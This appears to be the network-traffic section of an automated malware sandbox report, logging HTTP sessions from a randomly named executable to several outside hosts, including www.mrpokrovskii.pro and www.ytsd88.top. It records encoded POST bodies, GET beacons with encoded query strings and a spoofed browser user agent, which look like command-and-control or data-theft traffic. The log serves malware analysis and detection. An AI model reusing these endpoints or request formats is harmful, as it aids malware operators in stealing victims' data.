70 50 38 4d 69 50 4e 76 4e 36 62 63 70 47 6a 35 70 74 43 72 79 50 46 37 44 7a 6f 57 6b 38 [TRUNCATED]
                                                                                  Data Ascii: lH_L4=Mq/wbTVEdvZa6OVSHIAr+/BrOR3P3efaZlHFzSpB/PU8pYUPdn448lgyIIhjQDohEmSCHQoPkYDrwAO7B2U6gJI7UxPnLLFOxGkvahV9DXaOZD7SUp8MI4M1fbhN8zs1W5ITgR0vr0/Av+bSqKCb1jmAr+tKxvONy7Uy0U3ha04FpMPnKVekDB3d6PeubJxFCKxevEs1JxHaap2cC4YAU/9rVoqcnM5h8IIBd+R/t4NYg0RE7OQfeL9Wv9Oaj6bAkG4Valq07X33Un8r1kr1K+kwgDDYHTDUJtnoA2uB/Lp4xipP8MiPNvN6bcpGj5ptCryPF7DzoWk8lE6FVd7yEX8F8nupG2UeCZG+fleAO1HcN9QYOk9CEjZs0ha+QEL7euE3gm46uVbXLAGB9+2MZYll+1HWXLX7n4zRA2QuNmt5UahrNy45avU2JQat6OnGD6o0J4BsGfhFMgcP8ArFwzuPCnhi6I9JqTjMKt22nzvjAKInBqFKN9Cy8ryQcHqfcdKJuUtiJsNGb+GF3MpSX3YmSXoXRoe+CYJeWewX2h6W4146TKSoKG/0A4/rH3x6C4wzWUV723iy4smJZC1ZWf9m67G0+Fn7hVWIoIMX+xd/wcEfbuJMRHzJOwxBDZ9e0PddZ1XMPxZdtT2xQ4Bn3qD3Ri2l4S4ILSvOF4h1rwcHw5Mc4GJmcbNBqOy2dLoVSEZ+Cpu/Rd3eMeN7Ww9heYoT8sINIwEnbP4VVI/6ebBFCIVZ8qslpPjIpD8gCy/oLJgqRHyhcIHaBWVtwVYhzW5p7OOlmQDIZUiOg/guQiUKt9T4NgbKQ1HTGRQtKGZOpLfF33ibzTI4sAgZ0bFe3jmWiYNkffOEkeilaaSCcCMy4FNa0F2lls75NWs0qpbrWaiqxeT/8yUGOBXwnjUMN7Gdfvtpo+RruMcDIp5nn5SklItsT4r2v8unij49kWv9WSu7ploAnx/EDPp/37UxX7pbUFODxKQFvGgzYVdoD0oo/g [TRUNCATED]
                                                                                  Nov 27, 2024 01:26:16.123919964 CET380INHTTP/1.1 404 Not Found
                                                                                  content-type: text/html; charset=iso-8859-1
                                                                                  content-length: 196
                                                                                  date: Wed, 27 Nov 2024 00:26:15 GMT
                                                                                  server: LiteSpeed
                                                                                  x-tuned-by: N0C
                                                                                  connection: close
                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  12192.168.2.549857146.88.233.115803812C:\Program Files (x86)\gFGqeaWqpCObVJdzrccxBgzYNETtKfLEBKNnEuNERPFyzzWJpUVvFafGUP\pDqSqZXvqQcT.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Nov 27, 2024 01:26:17.359808922 CET363OUTGET /11t3/?lH_L4=BoXQYlgPFtFW2+QaEcN/9vg3Pg7HxeD9OGXhxFZv9pg5w5kxRGgY33EbCKURTw9NMXrcECQepab13HCWL013x4IWAXPzPql46H99XQd8N1WVXRvZaJo9RbMIS7VF6QhjMA==&005PE=aNcLxhD894SLKl HTTP/1.1
                                                                                  Host: www.smartcongress.net
                                                                                  Accept: */*
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Connection: close
                                                                                  User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MATMJS)
                                                                                  Nov 27, 2024 01:26:18.682638884 CET380INHTTP/1.1 404 Not Found
                                                                                  content-type: text/html; charset=iso-8859-1
                                                                                  content-length: 196
                                                                                  date: Wed, 27 Nov 2024 00:26:18 GMT
                                                                                  server: LiteSpeed
                                                                                  x-tuned-by: N0C
                                                                                  connection: close
                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  13192.168.2.549875109.70.26.37803812C:\Program Files (x86)\gFGqeaWqpCObVJdzrccxBgzYNETtKfLEBKNnEuNERPFyzzWJpUVvFafGUP\pDqSqZXvqQcT.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Nov 27, 2024 01:26:24.609863043 CET618OUTPOST /2pji/ HTTP/1.1
                                                                                  Host: www.mrpokrovskii.pro
                                                                                  Accept: */*
                                                                                  Accept-Encoding: gzip, deflate
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Origin: http://www.mrpokrovskii.pro
                                                                                  Cache-Control: max-age=0
                                                                                  Content-Length: 206
                                                                                  Connection: close
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Referer: http://www.mrpokrovskii.pro/2pji/
                                                                                  User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MATMJS)
                                                                                  Data Raw: 6c 48 5f 4c 34 3d 33 35 4b 67 37 6e 33 4b 63 77 49 4f 56 49 42 6c 6e 71 72 58 31 36 62 45 45 2f 70 79 34 42 55 7a 34 37 4e 6f 6c 4c 73 43 68 45 6f 45 70 6b 39 66 74 65 76 62 67 78 38 66 5a 59 68 54 45 67 44 61 4f 5a 68 6b 59 42 62 4c 43 7a 61 6e 6c 38 77 36 51 79 51 56 37 44 52 72 75 76 59 53 39 33 4c 5a 2f 6d 68 39 63 64 53 6a 6a 36 51 66 55 4e 6e 72 4a 55 31 2b 56 56 70 31 57 73 71 30 44 4f 31 50 2f 49 72 6e 55 39 61 55 44 64 51 41 42 37 63 36 4f 2b 2f 2b 32 68 4b 4e 59 6e 4e 4d 35 41 57 59 6b 54 42 75 58 44 53 36 2b 69 65 32 56 4f 6b 53 35 33 4b 62 56 55 6b 4e 63 57 52 76 6e 4a 55 76 6a 63 6e 56 7a 63 41 3d
                                                                                  Data Ascii: lH_L4=35Kg7n3KcwIOVIBlnqrX16bEE/py4BUz47NolLsChEoEpk9ftevbgx8fZYhTEgDaOZhkYBbLCzanl8w6QyQV7DRruvYS93LZ/mh9cdSjj6QfUNnrJU1+VVp1Wsq0DO1P/IrnU9aUDdQAB7c6O+/+2hKNYnNM5AWYkTBuXDS6+ie2VOkS53KbVUkNcWRvnJUvjcnVzcA=


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  14192.168.2.549881109.70.26.37803812C:\Program Files (x86)\gFGqeaWqpCObVJdzrccxBgzYNETtKfLEBKNnEuNERPFyzzWJpUVvFafGUP\pDqSqZXvqQcT.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Nov 27, 2024 01:26:27.267924070 CET638OUTPOST /2pji/ HTTP/1.1
                                                                                  Host: www.mrpokrovskii.pro
                                                                                  Accept: */*
                                                                                  Accept-Encoding: gzip, deflate
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Origin: http://www.mrpokrovskii.pro
                                                                                  Cache-Control: max-age=0
                                                                                  Content-Length: 226
                                                                                  Connection: close
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Referer: http://www.mrpokrovskii.pro/2pji/
                                                                                  User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MATMJS)
                                                                                  Data Raw: 6c 48 5f 4c 34 3d 33 35 4b 67 37 6e 33 4b 63 77 49 4f 48 5a 78 6c 6c 4e 2f 58 7a 61 62 48 61 50 70 79 32 68 55 33 34 36 78 6f 6c 4b 70 48 68 52 41 45 71 41 35 66 72 71 62 62 6e 78 38 66 4d 6f 67 5a 4a 41 44 52 4f 5a 64 61 59 46 48 4c 43 7a 4f 6e 6c 2b 34 36 52 46 38 53 36 54 52 70 33 2f 59 51 6c 58 4c 5a 2f 6d 68 39 63 64 58 47 6a 38 34 66 56 38 58 72 49 31 31 39 4a 46 70 32 65 4d 71 30 49 75 31 55 2f 49 71 43 55 38 57 36 44 65 34 41 42 2f 59 36 4f 71 72 39 34 68 4b 4c 41 48 4d 6d 2b 56 4c 47 68 51 6b 69 4b 79 62 34 75 6a 71 59 5a 59 56 34 6a 56 43 7a 47 30 49 31 4d 46 5a 59 32 35 31 47 35 2f 33 6c 74 4c 56 65 71 53 4d 53 43 34 49 46 6a 69 59 34 52 4c 33 66 44 66 41 73
                                                                                  Data Ascii: lH_L4=35Kg7n3KcwIOHZxllN/XzabHaPpy2hU346xolKpHhRAEqA5frqbbnx8fMogZJADROZdaYFHLCzOnl+46RF8S6TRp3/YQlXLZ/mh9cdXGj84fV8XrI119JFp2eMq0Iu1U/IqCU8W6De4AB/Y6Oqr94hKLAHMm+VLGhQkiKyb4ujqYZYV4jVCzG0I1MFZY251G5/3ltLVeqSMSC4IFjiY4RL3fDfAs


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  15192.168.2.549888109.70.26.37803812C:\Program Files (x86)\gFGqeaWqpCObVJdzrccxBgzYNETtKfLEBKNnEuNERPFyzzWJpUVvFafGUP\pDqSqZXvqQcT.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Nov 27, 2024 01:26:29.924362898 CET1655OUTPOST /2pji/ HTTP/1.1
                                                                                  Host: www.mrpokrovskii.pro
                                                                                  Accept: */*
                                                                                  Accept-Encoding: gzip, deflate
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Origin: http://www.mrpokrovskii.pro
                                                                                  Cache-Control: max-age=0
                                                                                  Content-Length: 1242
                                                                                  Connection: close
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Referer: http://www.mrpokrovskii.pro/2pji/
                                                                                  User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MATMJS)
                                                                                  Data Raw: 6c 48 5f 4c 34 3d 33 35 4b 67 37 6e 33 4b 63 77 49 4f 48 5a 78 6c 6c 4e 2f 58 7a 61 62 48 61 50 70 79 32 68 55 33 34 36 78 6f 6c 4b 70 48 68 52 59 45 70 7a 78 66 74 37 62 62 6d 78 38 66 51 34 67 61 4a 41 44 4d 4f 64 78 65 59 46 4c 62 43 77 32 6e 6c 63 41 36 59 58 45 53 77 54 52 70 2f 66 59 56 39 33 4b 44 2f 6d 78 35 63 64 48 47 6a 38 34 66 56 2b 50 72 42 45 31 39 61 31 70 31 57 73 71 77 44 4f 30 61 2f 49 6a 2f 55 38 43 45 44 50 59 41 41 62 38 36 49 63 58 39 77 68 4b 4a 56 48 4d 2b 2b 56 50 6e 68 51 4a 54 4b 79 76 47 75 6b 47 59 63 4f 31 6a 68 6c 43 53 61 46 68 56 4d 6b 42 49 6f 63 41 72 79 4e 33 6d 75 5a 39 44 77 68 38 6b 49 64 45 33 71 69 6c 31 47 76 44 72 46 71 46 73 46 56 66 6a 37 31 45 52 6a 4f 2f 37 35 4a 6d 2b 37 51 6a 75 71 42 55 38 6d 57 44 42 66 6f 4f 53 79 6f 36 73 31 4f 56 71 70 2b 4c 6b 49 52 6d 76 65 45 45 74 6c 74 38 36 6e 55 6c 53 41 51 34 62 4d 41 7a 42 6e 7a 56 48 2b 59 47 35 4c 76 31 42 38 6f 52 50 50 45 67 6a 77 6e 59 45 34 5a 69 41 66 30 42 6e 59 38 71 48 2b 4d 6a 6d 72 32 34 6a [TRUNCATED]
                                                                                  Data Ascii: lH_L4=35Kg7n3KcwIOHZxllN/XzabHaPpy2hU346xolKpHhRYEpzxft7bbmx8fQ4gaJADMOdxeYFLbCw2nlcA6YXESwTRp/fYV93KD/mx5cdHGj84fV+PrBE19a1p1WsqwDO0a/Ij/U8CEDPYAAb86IcX9whKJVHM++VPnhQJTKyvGukGYcO1jhlCSaFhVMkBIocAryN3muZ9Dwh8kIdE3qil1GvDrFqFsFVfj71ERjO/75Jm+7QjuqBU8mWDBfoOSyo6s1OVqp+LkIRmveEEtlt86nUlSAQ4bMAzBnzVH+YG5Lv1B8oRPPEgjwnYE4ZiAf0BnY8qH+Mjmr24jhUPBnSe98dYjBDRLIWQWYGD9x6tkM1XYXQQNRnTdnF0ufh7vZaySS68XQbVSccGhyGq8zb0CyRR4ks1Z7aIhPt4ic+I7IyouMyL4An8vU7Ks3PJ65DBjEbpph5A8lJuyY09M4MHbInnUfwUk+Ah9bUGZIg1XEuvC/4baPhV5QBcrgXAYI3HMXzISKUii/KvK2krlHYR91yNC46+X7YkVT2iVQyCDJriRy0750uTIZ2fgBxr72vLBUIdsgBmyj6/vY0ftERC4N4gKWYHDrDsZLBY4m+FlrJ8AyuSnXD5Xw94QGhLxly3OBj1Sz8AWCcR/TnTISR7V3Vr3lbs11uNrWIF0X5skr42UDEarlYfTEzuABugJCJUZ8em68ryHs/NFl6pIQy1pD96eQO3U4PVTfBVluBM66aZ8l//ITGc2VDawlnSA2Mtg5DyA2zkv00oWMZvrYqoYpkH/NwtXPHHxJK7kIfIqEV5oW42zp1bbioz88ubKoHcMUPxoDQQwuPQbbAn740S3GwCZlEbRZe0cDqPAeX4ZoicZh9YQsWQUinWWqZBvAn1AkxfE5MlwKm2EIybPOwIIgQHbk3m8FYZA3/k52EBhBdp5Bn0KzEKassnWbFvZ0anOVej8sPfSf049QiAnKAbJDYD2UWa0Q1ilgzIlZmLlJmzVUM [TRUNCATED]


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  16192.168.2.549895109.70.26.37803812C:\Program Files (x86)\gFGqeaWqpCObVJdzrccxBgzYNETtKfLEBKNnEuNERPFyzzWJpUVvFafGUP\pDqSqZXvqQcT.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Nov 27, 2024 01:26:32.605792046 CET362OUTGET /2pji/?005PE=aNcLxhD894SLKl&lH_L4=67iA4TPPdQ9nErotgeyL+Ya2EPxYwBsEvI1Cgt9ewFwChBdA65DXjWpTSdFtRBveCaF8GV/HBCb4pJoPY3YT9yZ96oMLsgfQ1G9JdO2EtcszdOb7L0lpI3ZCf/THH8NE8w== HTTP/1.1
                                                                                  Host: www.mrpokrovskii.pro
                                                                                  Accept: */*
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Connection: close
                                                                                  User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MATMJS)


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  17192.168.2.54995847.76.213.197803812C:\Program Files (x86)\gFGqeaWqpCObVJdzrccxBgzYNETtKfLEBKNnEuNERPFyzzWJpUVvFafGUP\pDqSqZXvqQcT.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Nov 27, 2024 01:27:00.840353966 CET600OUTPOST /egqi/ HTTP/1.1
                                                                                  Host: www.ytsd88.top
                                                                                  Accept: */*
                                                                                  Accept-Encoding: gzip, deflate
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Origin: http://www.ytsd88.top
                                                                                  Cache-Control: max-age=0
                                                                                  Content-Length: 206
                                                                                  Connection: close
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Referer: http://www.ytsd88.top/egqi/
                                                                                  User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MATMJS)
                                                                                  Data Raw: 6c 48 5f 4c 34 3d 57 35 66 78 66 53 66 32 68 6a 52 31 47 66 48 6b 47 51 2f 46 49 44 64 32 30 53 31 52 50 53 4a 76 4d 48 66 47 35 31 45 38 42 6d 36 4d 4b 79 56 50 42 5a 42 69 48 56 6c 58 37 52 6e 6f 4c 36 62 58 55 35 51 51 4c 77 56 46 33 46 4f 41 32 43 47 51 41 65 63 61 6b 74 64 33 35 4b 52 39 37 63 36 38 59 6c 5a 30 6c 7a 62 38 35 2b 59 71 6c 43 4b 58 39 35 68 63 74 2f 30 65 2f 6a 66 57 64 43 38 41 4a 32 79 37 31 2f 4e 34 67 51 53 44 39 76 52 5a 46 65 6b 78 71 42 74 55 56 77 72 62 32 46 4c 65 43 38 4a 68 7a 61 49 59 68 42 32 68 73 49 36 55 62 32 50 75 57 6f 4a 6d 7a 4c 38 45 75 47 57 4a 7a 57 74 76 2f 67 30 3d
                                                                                  Data Ascii: lH_L4=W5fxfSf2hjR1GfHkGQ/FIDd20S1RPSJvMHfG51E8Bm6MKyVPBZBiHVlX7RnoL6bXU5QQLwVF3FOA2CGQAecaktd35KR97c68YlZ0lzb85+YqlCKX95hct/0e/jfWdC8AJ2y71/N4gQSD9vRZFekxqBtUVwrb2FLeC8JhzaIYhB2hsI6Ub2PuWoJmzL8EuGWJzWtv/g0=
                                                                                  Nov 27, 2024 01:27:02.412770033 CET574INHTTP/1.1 404 Not Found
                                                                                  Server: nginx
                                                                                  Date: Wed, 27 Nov 2024 00:27:02 GMT
                                                                                  Content-Type: text/html
                                                                                  Content-Length: 409
                                                                                  Connection: close
                                                                                  ETag: "66d016cf-199"
                                                                                  Data Raw: 3c 68 74 6d 6c 3e 0a 3c 73 74 79 6c 65 3e 0a 09 2e 62 74 6c 69 6e 6b 20 7b 0a 09 63 6f 6c 6f 72 3a 20 23 32 30 61 35 33 61 3b 0a 09 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 6e 6f 6e 65 3b 0a 7d 0a 3c 2f 73 74 79 6c 65 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 35 70 78 22 20 3e 50 6f 77 65 72 20 62 79 20 3c 61 20 63 6c 61 73 73 3d 22 62 74 6c 69 6e 6b 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 74 2e 63 6e 2f 3f 66 72 6f 6d 3d 34 30 34 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e e5 a0 a1 e5 a1 94 20 28 e5 [TRUNCATED]
                                                                                  Data Ascii: <html><style>.btlink {color: #20a53a;text-decoration: none;}</style><meta charset="UTF-8"><html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><div style="text-align: center;font-size: 15px" >Power by <a class="btlink" href="https://www.bt.cn/?from=404" target="_blank"> ()</a></div></body></html>


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  18192.168.2.54996447.76.213.197803812C:\Program Files (x86)\gFGqeaWqpCObVJdzrccxBgzYNETtKfLEBKNnEuNERPFyzzWJpUVvFafGUP\pDqSqZXvqQcT.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Nov 27, 2024 01:27:04.005177975 CET620OUTPOST /egqi/ HTTP/1.1
                                                                                  Host: www.ytsd88.top
                                                                                  Accept: */*
                                                                                  Accept-Encoding: gzip, deflate
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Origin: http://www.ytsd88.top
                                                                                  Cache-Control: max-age=0
                                                                                  Content-Length: 226
                                                                                  Connection: close
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Referer: http://www.ytsd88.top/egqi/
                                                                                  User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MATMJS)
                                                                                  Data Raw: 6c 48 5f 4c 34 3d 57 35 66 78 66 53 66 32 68 6a 52 31 48 2b 33 6b 41 33 72 46 4f 6a 64 31 71 43 31 52 45 79 4a 30 4d 48 6a 47 35 78 39 6e 42 51 4b 4d 4b 54 6c 50 41 59 42 69 55 6c 6c 58 6a 42 6e 74 46 61 61 36 55 35 73 59 4c 78 70 46 33 42 65 41 32 44 32 51 41 74 30 64 6b 39 64 50 31 71 52 2f 6a 38 36 38 59 6c 5a 30 6c 7a 6e 57 35 2b 41 71 6c 7a 36 58 38 62 5a 66 6b 66 30 64 33 44 66 57 4c 43 38 4d 4a 32 79 6a 31 2b 42 57 67 53 71 44 39 72 64 5a 47 4d 4d 77 7a 78 74 57 52 77 72 50 79 30 7a 52 49 71 46 50 76 59 56 44 2f 6a 75 73 74 2b 4c 2b 42 55 48 47 46 49 6c 65 6a 59 30 7a 2f 32 33 67 70 31 39 66 68 33 69 69 55 59 30 52 47 36 42 35 65 74 46 2f 4a 76 59 64 77 70 68 75
                                                                                  Data Ascii: lH_L4=W5fxfSf2hjR1H+3kA3rFOjd1qC1REyJ0MHjG5x9nBQKMKTlPAYBiUllXjBntFaa6U5sYLxpF3BeA2D2QAt0dk9dP1qR/j868YlZ0lznW5+Aqlz6X8bZfkf0d3DfWLC8MJ2yj1+BWgSqD9rdZGMMwzxtWRwrPy0zRIqFPvYVD/just+L+BUHGFIlejY0z/23gp19fh3iiUY0RG6B5etF/JvYdwphu
                                                                                  Nov 27, 2024 01:27:05.521507025 CET574INHTTP/1.1 404 Not Found
                                                                                  Server: nginx
                                                                                  Date: Wed, 27 Nov 2024 00:27:05 GMT
                                                                                  Content-Type: text/html
                                                                                  Content-Length: 409
                                                                                  Connection: close
                                                                                  ETag: "66d016cf-199"
                                                                                  Data Raw: 3c 68 74 6d 6c 3e 0a 3c 73 74 79 6c 65 3e 0a 09 2e 62 74 6c 69 6e 6b 20 7b 0a 09 63 6f 6c 6f 72 3a 20 23 32 30 61 35 33 61 3b 0a 09 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 6e 6f 6e 65 3b 0a 7d 0a 3c 2f 73 74 79 6c 65 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 35 70 78 22 20 3e 50 6f 77 65 72 20 62 79 20 3c 61 20 63 6c 61 73 73 3d 22 62 74 6c 69 6e 6b 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 74 2e 63 6e 2f 3f 66 72 6f 6d 3d 34 30 34 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e e5 a0 a1 e5 a1 94 20 28 e5 [TRUNCATED]
                                                                                  Data Ascii: <html><style>.btlink {color: #20a53a;text-decoration: none;}</style><meta charset="UTF-8"><html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><div style="text-align: center;font-size: 15px" >Power by <a class="btlink" href="https://www.bt.cn/?from=404" target="_blank"> ()</a></div></body></html>


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  19192.168.2.54997347.76.213.197803812C:\Program Files (x86)\gFGqeaWqpCObVJdzrccxBgzYNETtKfLEBKNnEuNERPFyzzWJpUVvFafGUP\pDqSqZXvqQcT.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Nov 27, 2024 01:27:06.679953098 CET1637OUTPOST /egqi/ HTTP/1.1
                                                                                  Host: www.ytsd88.top
                                                                                  Accept: */*
                                                                                  Accept-Encoding: gzip, deflate
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Origin: http://www.ytsd88.top
                                                                                  Cache-Control: max-age=0
                                                                                  Content-Length: 1242
                                                                                  Connection: close
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Referer: http://www.ytsd88.top/egqi/
                                                                                  User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MATMJS)
                                                                                  Data Raw: 6c 48 5f 4c 34 3d 57 35 66 78 66 53 66 32 68 6a 52 31 48 2b 33 6b 41 33 72 46 4f 6a 64 31 71 43 31 52 45 79 4a 30 4d 48 6a 47 35 78 39 6e 42 54 71 4d 4b 46 35 50 42 37 5a 69 58 6c 6c 58 39 52 6e 73 46 61 62 34 55 39 34 69 4c 78 6c 56 33 48 43 41 32 6c 69 51 52 6f 41 64 71 39 64 50 39 4b 52 2b 37 63 36 54 59 6c 4a 4f 6c 79 4c 57 35 2b 41 71 6c 77 53 58 31 70 68 66 6f 2f 30 65 2f 6a 65 5a 64 43 39 52 4a 32 71 64 31 2b 46 6f 67 42 69 44 39 4c 4e 5a 57 76 6b 77 73 42 74 59 57 77 71 49 79 31 4f 52 49 73 68 70 76 5a 78 74 2f 68 2b 73 74 66 7a 67 52 58 62 43 54 75 31 52 6f 4c 6b 4e 68 32 72 53 68 6c 6c 51 68 47 4f 38 63 4e 4d 55 49 4e 52 54 57 4e 77 64 56 36 49 75 37 38 38 43 38 66 79 53 34 62 56 70 38 58 54 59 67 41 37 47 77 62 57 78 4c 54 70 2f 64 49 42 4a 33 45 39 39 4c 52 62 75 76 78 36 55 71 78 48 41 4c 39 38 4d 68 6b 50 46 4d 77 33 67 4c 51 42 43 6e 66 37 43 31 50 36 66 33 65 73 46 6d 44 31 32 63 36 44 59 79 59 4e 44 6e 4c 4a 49 5a 6b 6b 35 6c 50 2f 2b 59 43 48 47 45 41 66 57 4c 51 42 6c 73 6c 72 57 [TRUNCATED]
